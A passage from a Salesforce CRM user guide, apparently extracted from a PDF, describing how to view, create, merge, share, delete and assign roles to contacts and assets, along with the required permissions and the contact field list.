Note that if you delete an account with a related contact that is associated with an asset, all three records are deleted. To
restore all three records, restore the account record.

Note:  You can delete an asset individually without deleting any related record. However, if you later delete the related
record, you cannot recover the asset from the Recycle Bin.

To delete an asset:
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1. Locate the asset on the Assets related list of an account or contact, or on an asset list view from the Products tab.
2. Click Del next to the asset you want to delete.
3. Click OK.

See Also:
Assets Overview

Searching for Assets
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on assetsTo view assets:

1. Enter your search terms in the sidebar or header search box.
2. Click Search.
3. From the search results, click an item to open it or click Edit, if available.

You can also create an asset list view from the Products tab to find assets that match specific criteria.

TRACKING PEOPLE ASSOCIATED WITH BUSINESS ACCOUNTS

Contacts Overview
Available in: All Editions except Database.com

Contacts are the people associated with your business accounts that you need to track in Salesforce. For each contact, you can
store various kinds of information, such as phone numbers, addresses, titles, and roles in a deal.

The Contacts tab lets you quickly create and locate contacts, as well as sort and filter contacts using standard and custom list
views. And you can use this tab to view and edit detailed information for each contact you have access to.
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You can also enhance your traditional contact data with your customers’ social information. With the Social Accounts and
Contacts feature, you can see your contacts’ social network profiles and other social data directly in Salesforce. Easy access to
this information helps you know your customers better, so you can solve their problems and build stronger relationships.

See Also:
Contacts Home
Social Accounts, Contacts, and Leads Overview
Resolving Your Synced Outlook Contacts

Contacts Home
Available in: All Editions except Database.com

User Permissions Needed

“Read” on contactsTo view Contacts tab:

“Read” on contactsTo view contacts:

“Create” on contactsTo create contacts:

Clicking on the Contacts tab displays the contacts home page.

• In the View section, select a list view from the drop-down list to go directly to that list page, or click Create New View to
define your own custom view.

• In the Recent Contacts section, select an item from the drop-down list to display a brief list of the top contacts matching
that criteria. From the list, you can click any contact name to go directly to the contact detail. Toggle the Show 25 items
and Show 10 items links to change the number of items that display. The fields you see are determined by the “Contacts
Tab” search layout defined by your administrator and by your field-level security settings (available in Enterprise, Unlimited,
and Developer Editions only). The Recent Contacts choices are:

DescriptionRecent Contacts Choice

The last ten or twenty-five contacts you viewed, with the
most recently viewed contact listed first. This list is derived

Recently Viewed

from your recent items and includes records owned by you
and other users.

The last ten or twenty-five contacts you created, with the
most recently created contact listed first. This list only
includes records owned by you.

Recently Created

The last ten or twenty-five contacts you updated, with the
most recently updated contact listed first. This list only
includes records owned by you.

Recently Modified
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• Under Quick Create, fill in the fields to add a new contact. Alternatively, click New next to the Recent Contacts section
to create a new contact.

• Under Reports, click any report name to jump to that report.

• Select any of the links under Tools to manage your contacts.

• If you sync contacts from Outlook using Salesforce for Outlook, you may see a banner at the top of your Contacts home
page that links to a list of your unresolved contacts. These are synced Outlook contacts that still need to be assigned to
Salesforce accounts.

• Person accounts appear in contact list views but not the Recent Contacts list on the Contacts home page.

See Also:
Contacts Overview
Using Contacts

Viewing Contact Lists
Available in: All Editions except Database.com

User Permissions Needed

“Read” on contactsTo view contacts:

“Create” on contactsTo create contacts:

The contacts list page displays a list of contacts in your current view. To show a filtered list of items, select a predefined list
from the View drop-down list, or click Create New View to define your own custom views.To edit or delete any view you
created, select it from the View drop-down list and click Edit.

• Click a contact name to view the detail. Click Edit or Del to edit or delete the contact.

• If Chatter is enabled, click  or  to follow or stop following a contact in your Chatter feed.
• Click New Contact or select Contact from the Create New drop-down list in the sidebar to create a contact.

• To add contacts to an existing campaign, select the box next to one or more contacts, and then click Add to Campaign.
Alternatively, select the box in the column header to select all displayed records, then click Add to Campaign.

• Click the Open Calendar link at the bottom of the page to display a weekly view of a calendar underneath the list.
Then, you can drag a record from the list to a time slot on the calendar to quickly create an event associated with the record.
Note that your administrator controls the availability of drag-and-drop scheduling.

Working with Person Accounts

Person accounts appear in contact list views but not the Recent Contacts list on the Contacts home page.

• When you select a person account name on a contact list view, the corresponding person account appears on the Accounts
tab.

• To make person accounts easy to find, create a custom list view, adding the Is Person Account icon as a column.
Person accounts do not have contacts.

804

Viewing Contact ListsTracking People Associated with Business Accounts



Note: In most situations, you can use person accounts as if they were contacts. You can include them in all contact
list views except on the contacts home page..

Note:  Professional, Enterprise, Unlimited, and Developer Edition organizations can grant access to contacts beyond
what the sharing model allows. See Sharing Contacts on page 821.Contacts that are not linked to an account are
always private, regardless of your organization’s sharing model. Only the owner of the contact and administrators can
view it. Sharing rules and workflow rules do not apply to private contacts. If your organization uses divisions, private
contacts always belong to the global division.

See Also:
Finding Out if Your Partners Use Salesforce
Accounts Overview

Using Contacts
Available in: All Editions Database.com

User Permissions Needed

“Read” on contactsTo view contacts:

“Edit” on contactsTo edit contacts:

“Edit” on contacts

AND

“Edit Self-Service”

To edit accounts on contacts enabled to use a Customer Portal:

“Edit” on contacts

AND

“Manage Partners”

To edit accounts on contacts enabled to use a partner portal:

“Read” on accounts and contactsTo view person accounts:

“Edit” on accounts and contactsTo edit person accounts:

Contacts are the individuals associated with your accounts.

• View and edit contact details (for example, the account name)

• Use Social Accounts and Contacts to view your contacts’ social network profiles, see their level of influence in social media,
and watch related YouTube videos.

• Find contact-related information (for example, opportunities)

• Find and add contacts from Data.com

• Find and add Data.com contacts for a specific account
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• Clean contact records with Data.com Clean.

• View contact updates and comments (Chatter)

• Give Customer Portal users access to a contact

• Enable a contact as a partner portal user

• Enabling Partner Super User Access

• Troubleshoot partner portal user issues

• Enable a contact as a Self-Service portal user

See Also:
Social Accounts, Contacts, and Leads Overview
Data.com Product Suite Overview

Viewing and Editing Contact Details
Available in: All Editions Database.com

User Permissions Needed

“Read” on contactsTo view contacts:

“Edit” on contactsTo edit contacts:

“Edit” on contacts

AND

“Edit Self-Service”

To edit accounts on contacts enabled to use a Customer Portal:

“Edit” on contacts

AND

“Manage Partners”

To edit accounts on contacts enabled to use a partner portal:

“Read” on accounts and contactsTo view person accounts:

“Edit” on accounts and contactsTo edit person accounts:

Once you have located a contact on the Contacts home or list pages, click the contact name to display detailed information.

• Use inline editing to edit fields directly on the detail page. If inline editing isn’t enabled, contact your administrator.

• To display the page in edit mode, click Edit, make your changes, and click Save.

• To save the current contact and create another one, click Save & New.

• To open a printable display of the record details, in the top-right corner of the page, click Printable View.

Changing the Account for Contacts

If you change the Account Name field:
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• Cases and opportunities associated with the contact remain associated with the previous account and do not roll up to the
new account.

• New cases and opportunities created for the contact are associated with the new account.

There are additional considerations for contacts enabled for portals.

To change the account associated with a contact, you must meet one of these conditions:

• You have access to the contact, and you’re the owner of the target account or the boss of the owner in the role hierarchy.
• You are the owner of the contact or you have access to the contact, and you have access to the target account.
• You are an administrator.

If you don’t meet any of these conditions, contact your administrator to change the account associated with the contact.

See Also:
Contact Fields
Sending Stay-in-Touch Requests

Contact History
Available in: All Editions except Database.com

User Permissions Needed

“Read” on contactsTo view contacts:

The Contact History related list of a contact detail page tracks the changes to the contact. Any time a user modifies any of
the standard or custom fields whose history is set to be tracked on the contact, a new entry is added to the Contact History
related list. All entries include the date, time, nature of the change, and who made the change. Modifications to the related
lists on the contact are not tracked in the contact history.

See Also:
Contacts Overview
Finding Contact-Related Information (Related Lists)
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Finding Contact-Related Information (Related Lists)
Available in: All Editions Database.com

User Permissions Needed

“Read” on contactsTo view contacts:

“Edit” on contactsTo edit contacts:

“Edit” on contacts

AND

“Edit Self-Service”

To edit accounts on contacts enabled to use a Customer Portal:

“Edit” on contacts

AND

“Manage Partners”

To edit accounts on contacts enabled to use a partner portal:

“Read” on accounts and contactsTo view person accounts:

“Edit” on accounts and contactsTo edit person accounts:

Related lists, such as opportunities, display information related to a contact.

• Hover over the links at the top of a detail page to display the corresponding related list and its records. If Chatter is enabled,
hover links display below the feed. An interactive overlay allows you to quickly view and manage the related list items.
Click a hover link to jump to the content of the related list. If hover links are not enabled, contact your Salesforce
administrator.

• If hover details are enabled, hover over any lookup field on the detail page to view key information about a record before
clicking into that record’s detail page.

• To directly add new items, click New (or the equivalent button) at the top of a related list. For example, clicking New
Case lets you add a new case.

• To change the number of records shown for related lists, click View More below a related list, or click fewer or more at
the bottom of the page.

Viewing Related Lists

The related lists you see are determined by your:

• Personal customization
• Administrator's page layout customizations
• Permissions to view related data

See Also:
Contact History
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Self-Service for Contacts and Person Accounts
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit Self-Service Users”To enable Self-Service users:

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

To allow a customer to access your Self-Service portal, you must enable Self-Service for the customer’s contact or person
account record:

1. If the customer is a contact, click the Enable Self-Service button on the contact detail page. If the customer is a person
account, click the Enable Self-Service button on the person account detail page.

2. Verify the general information and locale settings, and enter any missing information. Note that the customer's Self-Service
Username defaults to his or her Email.

3. Optionally, select the Super User checkbox to enable the customer as a Self-Service super user who can view case
information, add comments, and upload attachments for all cases submitted by anyone in his or her company.

4. Select Generate new password and notify user immediately to email a Self-Service username and password
to the customer.

5. Click Save.

Note:  A Self-Service user can only view cases in the Self-Service portal that are associated with his or her account
record.

To disable Self-Service for a customer:

1. Click the View Self-Service button on the detail page.
2. Click Edit, and deselect the Active box.
3. Click Save.

Note:  You cannot delete an active Self-Service user; you can only deactivate his or her access to the Self-Service
portal. In addition, you cannot delete a contact or person account that is associated with an active Self-Service user.
Instead, deactivate his or her access to the Self-Service portal and then delete the contact or person account.

See Also:
What is a Person Account?
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Guidelines for Creating Contacts
Available in: All Editions except Database.com

Keep these tips and guidelines in mind when creating contacts:

• To create a contact that’s automatically associated with an account, view the account and click New Contact in the task
bar or Contact in the publisher actions list. You can also select New in the Contacts related list of an account.

• If your organization uses record types, you might be prompted to choose a Record Type when creating a contact. Different
record types can have different fields and different picklist values.

• If your organization uses divisions, the division of a new contact is automatically set to the division of the related account.

Note: Contacts that are not linked to an account are always private, regardless of your organization’s sharing model.
Only the owner of the contact and administrators can view it. Sharing rules and workflow rules do not apply to private
contacts. If your organization uses divisions, private contacts always belong to the global division.

See Also:
Cloning Contacts
Contact Fields
Creating Records

Cloning Contacts
Available in: All Editions except Database.com

User Permissions Needed

“Create” on contactsTo clone contacts:

The Clone button on a contact quickly creates a new contact with the same information as the existing contact, for example,
when you need to add multiple contacts for the same account.

Click Clone on an existing contact. Enter or change any information for the new contact, and click Save.

Note:  If you have read-only access to a field, the value of that field is not carried over to the cloned record.

See Also:
Contact Fields
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Changing the Account on Contacts Enabled for Portals
Available in: All Editions Database.com

User Permissions Needed

“Read” on contactsTo view contacts:

“Edit” on contactsTo edit contacts:

“Edit” on contacts

AND

“Edit Self-Service”

To edit accounts on contacts enabled to use a Customer Portal:

“Edit” on contacts

AND

“Manage Partners”

To edit accounts on contacts enabled to use a partner portal:

“Read” on accounts and contactsTo view person accounts:

“Edit” on accounts and contactsTo edit person accounts:

When you change the account on contacts enabled for a Customer Portal or partner portal:

• Portal users can access their own cases and opportunities from their previous accounts. Contacts that are Self-Service users
can view on the Self-Service portal only cases that are associated with their current account. Self-Service users cannot view
opportunities.

• Contacts’ portal roles are automatically updated to match the name of the account to which they are transferred (unless
they’re high-volume portal users, which don’t have roles). For example, the portal role “Account A Customer User” becomes
“Account B Customer User” (because a portal role’s name includes the name of the account with which it is associated).
Portal roles are unique to each account and are located under the account owner’s role in your organization’s role hierarchy.

• When you transfer a partner portal user to another account:

◊ Opportunities on each account are automatically recalculated through your organization’s forecast hierarchy.

◊ Opportunities owned by the partner portal user remain in the previous account.

This is because portal users’ roles are updated when you transfer them between accounts.
• Delegated partner user administrators and delegated Customer Portal user administrators can update portal users on

accounts to which they are transferred.
• You can only transfer contacts enabled for a partner portal to accounts that are enabled for a partner portal.

See Also:
Enabling the Customer Portal for Contacts and Person Accounts
Self-Service for Contacts and Person Accounts
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Contact Fields
The available fields vary according to which Salesforce Edition you have.

A contact has the following fields, listed in alphabetical order. Depending on your page layout and field-level security settings,
some fields may not be visible or editable.

If the contact record was added from Data.com, certain fields, as identified here, will be populated with the Data.com or Dun
& Bradstreet (D&B) value, if a value is available.

Allows Value from Data.com or D&BDescriptionField

 (D&B)Name of account that contact is linked
to. You can enter the account name, or

Account Name

select the account using the lookup icon.
Private contacts are those that do not
have an account.

When selected, allows contacts to
self-register for access to your Customer
Portal.

Allow Customer Portal
Self-Registration

Name of assistant. Up to 40 characters
are allowed in this field.

Assistant

Assistant’s phone number. Up to 40
characters are allowed in this field.

Asst. Phone

Birthday. You can enter a date, or choose
a date from the calendar that displays
when you put your cursor in the field.

Birthdate

 (Data.com)Indicates the record’s clean status as
compared with Data.com. Values are:

Clean Status

Not Compared, In Sync,
Reviewed, Different, Not
Found, or Inactive. This field is
available to only organizations that use
Data.com Prospector or Data.com Clean.

The default currency for all currency
amount fields in the contact. Amounts

Contact Currency

are displayed in the contact currency, and
are also converted to the user’s personal
currency. Available only for organizations
that use multiple currencies.

Division to which the contact belongs.
This value is automatically inherited from
the related account.

Contact Division
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Allows Value from Data.com or D&BDescriptionField

Available only in organizations that use
divisions to segment their data.

Assigned owner of contact. Not available
in Personal Edition.

Contact Owner

Name of the field that determines what
picklist values are available for the record.

Contact Record Type

Available in Enterprise, Unlimited, and
Developer Editions.

User who created the contact including
creation date and time. (Read only)

Created By

 (Data.com)The ID of the company in Data.com.
When Salesforce records are compared

Data.com Key

with Data.com records (via either manual
cleaning or automated clean jobs), if
Data.com finds a match, the two records
are linked by this field’s numeric value.

Associated business or organizational
unit. Up to 80 characters are allowed in
this field.

Department

Description of contact. Up to 32 KB of
data are allowed in this field. Only the
first 255 characters display in reports.

Description

Indicates that the contact does not want
to be contacted by phone. If you use

Do Not Call

Data.com, the Phone field value will be
masked out in search results and on the
Contact Card, and it will be blank in
.csv files created when you export
records.

 (Data.com)Email address. Must be a valid email
address in the form:

Email

jsmith@acme.com. Up to 80 characters
are allowed in this field.

Click the email address in this field to
send an email using your personal email
application. This type of email is not
logged as an activity on the contact
record.

If the Gmail Buttons and Links feature
is enabled, you can click the Gmail link
next to the field to send an email from
your Gmail account.
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Allows Value from Data.com or D&BDescriptionField

Indicates that the contact does not want
to receive email.  If you use Data.com,

Email Opt Out

the Email field value will be masked out
in search results and on the Contact
Card, and it will be blank in .csv files
created when you export records.

 (Data.com)Contact’s fax number. Up to 40
characters are allowed in this field.

Fax

Indicates if the person has requested not
to be included in broadcast faxes.

Fax Opt Out

 (Data.com)First name of the contact, as displayed
on the contact edit page. Up to 40
characters are allowed in this field.

First Name

First name of the contact translated into
the local language.

First Name (Local)

Person’s home phone number. Up to 40
characters are allowed in this field.

Home Phone

 (Data.com)Last name of the contact, as displayed
on the contact edit page. Up to 80
characters are allowed in this field.

Last Name

Last name of the contact translated into
the local language.

Last Name (Local)

The date that the most recent
Stay-in-Touch request was sent.

Last Stay-in-Touch Request
Date

The date that the most recent
Stay-in-Touch request was returned and
merged.

Last Stay-in-Touch Save Date

 (Data.com)Record source, for example,
Advertisement, Partner, or Web. Entry

Lead Source

is selected from a picklist of available
values, which are set by an administrator.
Each picklist value can have up to 40
characters.

 (Data.com)City portion of mailing address. Up to
40 characters are allowed in this field.

Mailing City

 (Data.com)Country portion of mailing address. Up
to 80 characters are allowed in this field.

Mailing Country

 (Data.com)The mailing country for the address.
Entry is selected from a picklist of
standard values.

Mailing Country (beta)
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Allows Value from Data.com or D&BDescriptionField

 (Data.com)State or province portion of mailing
address. Up to 80 characters are allowed
in this field.

Mailing State/Province

 (Data.com)The mailing state or province for the
address. Entry is selected from a picklist
of standard values.

Mailing State/Province (beta)

 (Data.com)Street mailing address. Up to 255
characters are allowed in this field.

Mailing Street

 (Data.com)Zip or postal code portion of mailing
address. Up to 20 characters are allowed
in this field.

Mailing Zip/Postal Code

Cellular or mobile phone number. Up to
40 characters are allowed in this field.

Mobile

User who last changed the contact fields,
including modification date and time.

Modified By

This does not track changes made to any
of the related list items on the contact.
(Read only)

 (Data.com)Combined first and last name of contact,
as displayed on the contact detail page.

Name

City portion of additional address. Up to
40 characters are allowed in this field.

Other City

Country portion of additional address.
Up to 80 characters are allowed in this
field.

Other Country

Another country for the address. Entry
is selected from a picklist of standard
values.

Other Country (beta)

State or province portion of additional
address. Up to 80 characters are allowed
in this field.

Other State/Province

Another state or province for the address.
Entry is selected from a picklist of
standard values.

Other State/Province (beta)

Street address portion of additional
address. Up to 255 characters are allowed
in this field.

Other Street

Zip or postal code portion of additional
address. Up to 20 characters are allowed
in this field.

Other Zip/Postal Code
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Allows Value from Data.com or D&BDescriptionField

Additional phone number listing. Up to
40 characters are allowed in this field.

Other Phone

 (Data.com)Contact’s primary phone number. Up to
40 characters are allowed in this field.

Phone

Name of contact’s manager. You can
enter an existing contact name, or select
the contact using the lookup icon.

Reports To

Title for addressing the person, for
example, Mr., Ms., Dr., or Prof. Entry

Salutation

is selected from a picklist of available
values, which are set by an administrator.
Each picklist value can have up to 40
characters.

 (Data.com)Person's position within his or her
organization. Up to 80 characters are
allowed in this field.

Title

Listing of custom links for contacts as
set up by your administrator.

Custom Links

For Self-Service contacts only. The
Username defaults to the Email. The

Username

contact must enter their username when
logging in to the Self-Service portal.

Note:  Starting with Spring ’12,
the Self-Service portal isn’t
available for new organizations.
Existing organizations continue
to have access to the
Self-Service portal.

See Also:
Guidelines for Creating Contacts
Cloning Contacts
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Displaying Contact Hierarchy
Available in: All Editions

User Permissions Needed

“Read” on contactsTo view org chart:

“Edit” on contactsTo change org chart:

To display an organization chart, enter the name of the contact’s manager in the Reports To field for each contact in the
account. Then, click the [View Org Chart] link on any contact in the account. Salesforce displays an organization chart
showing the contact hierarchy with the direct reports for each contact you entered.

Note:

To maintain a complete organization chart, make sure every contact in an account contains another contact in the
Reports To field. The only exception to this is the contact at the very top of the organization chart. If only one
contact in an account reports to no one, that account will have a single organization chart for the entire account.

Because of its flexibility, this feature will not prevent you from selecting Reports To contacts from other accounts.

See Also:
Contacts Overview
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Merging Duplicate Contacts
Available in: All Editions except Database.com

Customer Portal is available in: Enterprise, Unlimited, and Developer Editions

Partner Portal is available in: Enterprise and Unlimited Editions

User Permissions Needed

“Delete” on contactsTo merge contacts:

“Delete” on contacts

AND

“Edit Self-Service Users”

To merge Customer Portal enabled contacts:

“Delete” on contacts

AND

“Manage Partners”

To merge partner portal enabled contacts:

To merge duplicate contacts associated with a common account:

1. From the Contacts related list of an account, click Merge Contacts.
2. Check the rows of up to three contacts you want to merge. You can search the list of associated contacts to shorten the

list, or click All Contacts to view the full list of associated contacts. Click Next to continue.
3. Select one contact as the Master Record. Any data in hidden or read-only fields will be taken from the Master Record.

However, administrators and users with the “Edit Read Only Fields” permission can manually select which read-only fields
to retain. Note that hidden fields are not displayed.

4. Select the partner portal or Customer Portal user you want to retain.

This option is available only if a partner portal or Customer Portal is enabled for your organization.

You can select Not a portal user so that a merged contact does not include a portal user.

5. Select the fields that you want to retain from each record.

When there is conflicting data, the fields in the left column are preselected and the row is marked in purple.

6. Click the Merge button to complete the merge.

Tips for Merging Contacts

Consider the following when merging contacts:

• Any related items from any of the duplicate contacts will be associated with the merged contact.
• If you are merging duplicate contacts that are members of different campaigns, the campaign Member Status Updated

date for each contact is retained and associated with the newly merged contact.
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• Before merging contacts that both have active Self-Service usernames, deactivate one Self-Service username. The merged
record will adopt the active Self-Service username. For more information on the Self-Service username field, see Contact
Fields on page 812.

• Any account sharing and manual sharing for the master contact are applied to the newly merged contact.
• When you merge contacts that have Reports To relationships, the newly merged contact retains the Reports To field

from the selected Master Record.
• All discarded duplicate records are moved to the Recycle Bin.
• The newly merged contact displays the Created By date from the oldest contact you are merging, and shows the merge

date as the Modified By date.
• In organizations that use divisions, the merged contact is assigned to the division of the related account.
• Merging contacts is not tracked in the setup audit trail.
• You can delete a contact if you are an administrator, the contact owner, or a user above the contact owner in the organization

role hierarchy, and if you have the appropriate user permission.
• The newly merged contact is automatically included on any case teams in which the contacts were associated.
• The master contact replaces the duplicate contacts in all the requested meetings they were invited to. Also, all meeting

messages written by the duplicate contacts are automatically associated with the master contact. (Meeting messages appear
on the requested meeting's Web page and are visible to all invitees.)

• The master contact replaces the duplicate contacts in all the scheduled meetings they were invited to. However, make sure
to edit the event detail page and click Add to Invitees to add the new master contact to the meeting invitee list.

See it in action: How to Merge Contacts in Salesforce (1:48 minutes)

See Also:
Enabling the Customer Portal for Contacts and Person Accounts
Merging Updated Contact Information
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Merging Contacts Associated with Portal Users
Available in: All Editions except Database.com

Customer Portal is available in: Enterprise, Unlimited, and Developer Editions

Partner Portal is available in: Enterprise and Unlimited Editions

User Permissions Needed

“Delete” on contactsTo merge contacts:

“Delete” on contacts

AND

“Edit Self-Service Users”

To merge Customer Portal enabled contacts:

“Delete” on contacts

AND

“Manage Partners”

To merge partner portal enabled contacts:

When you merge contacts associated with portal users, see the information in Merging Duplicate Contacts on page 818 and
note these additional considerations:

• Review the information in Tips for Merging Contacts, which also applies to merging contacts associated with portal users.

• You can merge a portal contact record with another portal contact. For example, you can merge contacts enabled to use:

◊ A partner portal or Customer Portal.

◊ A partner portal with contacts enabled to use a Customer Portal or vice-versa.

◊ A partner portal or Customer Portal with contacts that are not enabled to use a portal.

• When you merge contacts that include partner portal and Customer Portal users, you must choose which type of portal
user to retain. The portal user you do not retain is disabled. However, after the contacts are merged, you can enable the
contact for access to the portal from which you removed during the merge process.

• To merge contacts associated with various accounts:

1. Transfer the contacts you want to merge into one account.
2. Merge the contacts associated with the common account.

• Portal users who are disabled during the merge process retain ownership of any records in which they are the owner. For
example, if a portal user owns a case, and the portal user is disabled, he or she remains the owner of the case until the case
is updated with a new owner.
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Searching for Contacts
Available in: All Editions except Database.com

User Permissions Needed

“Read” on contactsTo view contacts:

“Read” on accounts and contactsTo view person accounts:

1. Enter your search terms in the sidebar or header search box.
2. Click Search.

If you're using local contact names, search finds matches for standard or local contact names.

3. From the search results, click an item to open it or click Edit, if available.

You can also create a contact list view to locate contacts that match specific criteria.

See Also:
Contacts Overview

Sharing Contacts
Available in: Professional, Enterprise, Unlimited, and Developer Editions

You can share your own contacts individually. Use contact sharing to increase access to your contacts. You cannot restrict access
to contacts beyond your organization's default access levels.

To view and manage sharing details, click Sharing on the contact detail page. The Sharing Detail page lists the users, groups,
roles, and territories that have sharing access to the contact. On this page, you can do any of the following:

• To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
your own custom views.To edit or delete any view you created, select it from the View drop-down list and click Edit.

• Click Add to grant access to the record for other users, groups, roles, or territories.

• Click Expand List to view all users that have access to the record.

• For manual sharing rules that you created, click Edit or Del next to an item in the list to edit or delete the access level.

Special Considerations

• Make sure you are sharing records with users who have the appropriate “Read” object permission for viewing the shared
records.

• You cannot manually share a private contact (a contact without an account).
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• If you have permission to share an account, Salesforce automatically provides “Read” access to the associated account when
granting sharing access to a contact if the recipient does not already have it. If a recipient does not have access to the
account, you cannot share the contact unless you also have permission to share the account.

• If your organization-wide default for contacts is set to Controlled by Parent, the Contact Access options are not available
when sharing related records like accounts; instead, all access to contacts is determined by the user's access to the contact's
account.

• Contact sharing is not available for organizations that have territory management or person accounts.

◊ If your organization already has person accounts enabled, the organization-wide default for contacts is set to Controlled
by Parent and is not editable.

◊ If your organization does not have person accounts yet you want to enable one of them, set your organization-wide
default for contacts to Controlled by Parent, which removes all your contact sharing rules and manually shared contacts.

See Also:
Contacts Overview

Sending Stay-in-Touch Requests
Available in: All Editions except Database.com

User Permissions Needed

“Send Stay-in-Touch Requests”To request updates:

A quick and easy way to retrieve updated contact information from your contacts and person accounts is to send Stay-in-Touch
requests. You can request updates from:

• Contacts you own

• Contacts associated with accounts you own

• Contacts you can edit due to a sharing rule or manual record sharing

• Person accounts you own

Note:  The record must have a valid email address.

How it Works

1. On the detail page of a contact or person account, click Request Update either at the top of the page or in the Activity
History related list.

2. An outgoing email is created according to your personal Stay-in-Touch settings. As needed, edit the details of the email.
If Spell Checker is enabled for your organization, click Check Spelling to check the spelling of the message. Spell Checker
does not support all the languages that Salesforce supports. For example, Spell Checker doesn’t support Thai, Russian,
and double-byte languages, such as Japanese, Korean, or Chinese. Click Send to send the email.

3. The recipient receives the email and clicks a link to either provide updates or confirm no changes are necessary.
4. You receive an email notification. Click the link in the email to update, review, and accept or reject the new information.
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Note:  To send individual Stay-in-Touch requests, you must have the “Send Email” permission. You can send
individual Stay-in-Touch requests regardless of the recipient’s Email Opt Out setting.

See Also:
Merging Updated Contact Information
Mass Stay-in-Touch Update

Merging Updated Contact Information
When someone responds to a Stay-in-Touch request, you will receive an email that contains a link. To merge the new
information into Salesforce:

1. Click Update Now from the email you receive.
2. Review the new and original values.
3. Click Accept Changes to save the new data. Click Reject Changes to ignore the updates and retain the original values.

Note:  These updates do not trigger workflow rules.

See Also:
Sending Stay-in-Touch Requests
Editing Stay-in-Touch Settings

Mass Stay-in-Touch Update

Available in: All Editions except Database.com

User Permissions Needed

“Send Email”

AND

“Send Stay-in-Touch Requests”

To send mass Stay-in-Touch updates:

Use the Mass Stay-in-Touch wizard to request updated contact information from multiple contacts and person accounts
simultaneously.

To send a mass Stay-in-Touch email:

1. On the contacts home page, click Mass Stay-in-Touch from the Tools section.
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If your organization uses person accounts, the link also appears on the accounts home page.

2. Select a list view of contacts and person accounts from whom you are requesting updated information. You can also edit
existing list views and create new list views.

3. Click Go.
4. Select the individuals to whom the request will be sent. Note that records which lack email addresses cannot be selected.

Click Next to continue.
5. Review the email to be sent and click Send.

Recipients can reply to you via email with their latest information. You can merge these updates as you receive them.

Note:  Records in which the Email Opt Out box is checked do not appear in the list view, because you cannot send
mass emails to them.

See Also:
Sending Stay-in-Touch Requests
Editing Stay-in-Touch Settings

Deleting Contacts
Available in: All Editions except Database.com

User Permissions Needed

“Delete” on contactsTo delete contacts:

To delete a contact, click Del next to the contact on the contacts list page or in the Contacts related list of an account. You
can also delete a contact by clicking Delete on the contact detail page.

When you delete a contact, all related assets, campaign history, events, tasks, notes, and attachments are also deleted. You do
not need the “Delete” permission on any associated records that are included in the deletion. Associated opportunities, accounts,
entitlements, and cases are not deleted with the contact. The deleted contact is moved to the Recycle Bin. If you undelete the
contact, any related items are also restored including any inactive Self-Service username.

You cannot delete contacts that have associated:

• Cases

• Contracts

• Service contracts

• Partner user

• Assets with cases

• An active Self-Service user

• An active Customer Portal user
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Note:  You can delete a contact if you are an administrator, the contact owner, or a user above the contact owner in
the organization role hierarchy, and if you have the appropriate user permission. If you delete or remove an activity’s
primary contact, another contact becomes the primary contact in its place. You can edit the activity to manually select
another primary contact.

See Also:
Merging Duplicate Contacts

DEFINING ROLES THAT YOUR CONTACTS PLAY

Contact Roles Overview
Available in: All Editions except Database.com

A contact role defines the part that a contact or person account plays in a specific account, case, contract, or opportunity. For
example, Tom Jones might be the Decision Maker for the opportunity, and Mary Smith might be the Evaluator. You can
assign a contact role to any contact or person account that affects your account, case, contract, or opportunity. Contacts and
person accounts can have different contact roles on various accounts, cases, contracts, or opportunities.

The Contact Roles related list of an account, case, contract, or opportunity displays the roles that each contact or person
account plays in that record. On person account detail pages, the Opportunity Contact Roles related list displays the opportunities
on which the person account is listed in the Account Name field of the opportunity.

Note:  Users must have the appropriate user permissions and sharing access to view the contact information for any
person listed in the appropriate contact roles related lists.

See Also:
Adding Contact Roles
Viewing and Editing Contact Roles
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Adding Contact Roles
Available in: All Editions except Database.com

User Permissions Needed

“Edit” on the related object, such as accounts, cases, contracts,
or opportunities

AND

“Read” on contacts

To add contact roles:

To assign a contact role to a contact or person account:

1. Click New in the Contact Roles related list of an account, case, contract, or opportunity.
2. Click the lookup icon to select a contact or person account. Optionally, click New to create a new contact.

When you add or edit contact roles on an opportunity that is associated with a business account, the page automatically
displays the contacts for that business account. If the business account has more than 50 contacts, the contacts are not
automatically displayed, and you must use the lookup icon to select a contact.

3. Choose a role.
4. Optionally, select Primary to set the contact or person account as primary for the account, contract, or opportunity.

Note: On case contact roles, the Primary option is not available. The primary contact on a case is always the
contact listed under Contact Name in the Case Detail section.

5. Click Save.

When you create an opportunity from a contact detail page, that contact automatically becomes the primary contact on the
opportunity. However, a contact role is not automatically assigned.

Tip:  Adding person accounts in contact roles on accounts is available but not recommended. As a best practice, we
recommend using the Partners related list to associate person accounts with other accounts.

See Also:
Contact Roles Overview
Contact Role Fields
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Viewing and Editing Contact Roles
Available in: All Editions except Database.com

User Permissions Needed

“Read” on accounts, cases, contracts, or opportunitiesTo view contact roles:

“Edit” on the related object, such as accounts, cases, contracts,
or opportunities

AND

“Read” on contacts

To edit contact roles:

The Contact Roles related list of an account, case, contract, or opportunity displays the roles that each contact or person
account plays in that record. On person account detail pages, the Opportunity Contact Roles related list displays the opportunities
on which the person account is listed in the Account Name field of the opportunity.

• To add a contact role for the account, case, contract, or opportunity, click New in the Contact Roles related list. See Adding
Contact Roles on page 826.

• To send an email to all contact roles on a case, click Send an Email in the Contact Roles related list. See Sending Email
on page 1268.If a contact role does not have an email address specified on his or her contact record, the contact is not included
in the email.

• To update a contact role, click Edit next to a contact role. Click Save when you have finished making changes.

• To mark a contact or person account as primary on the account, contract, or opportunity, click Edit next to the contact
role entry, and select the Primary option.

Note: On case contact roles, the Primary option is not available. The primary contact on a case is always the
contact listed under Contact Name in the Case Detail section.

• To delete a contact role, click Del next to the contact role you want to delete.

• To create an opportunity related to a person account, click New in the Opportunity Contact Roles related list on a person
account.

See Also:
Contact Roles Overview
Contact Role Fields
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Contact Role Fields
Available in: All Editions except Database.com

A contact role has the following fields, listed in alphabetical order.

DescriptionField

Name of contact or person account. You can use the lookup
icon to either select someone or create a contact.

Contact

Option that specifies the contact or person account as primary
for the record.

Note that on case contact roles, the Primary option is not
available. The primary contact on a case is always the contact
listed under Contact Name in the Case Detail section.

Primary

Participating role in the account, case, contract, or opportunity,
for example, Buyer, Decision Maker, or Evaluator. (Selections
for this picklist can be customized by your administrator.)

Role

See Also:
Adding Contact Roles
Viewing and Editing Contact Roles

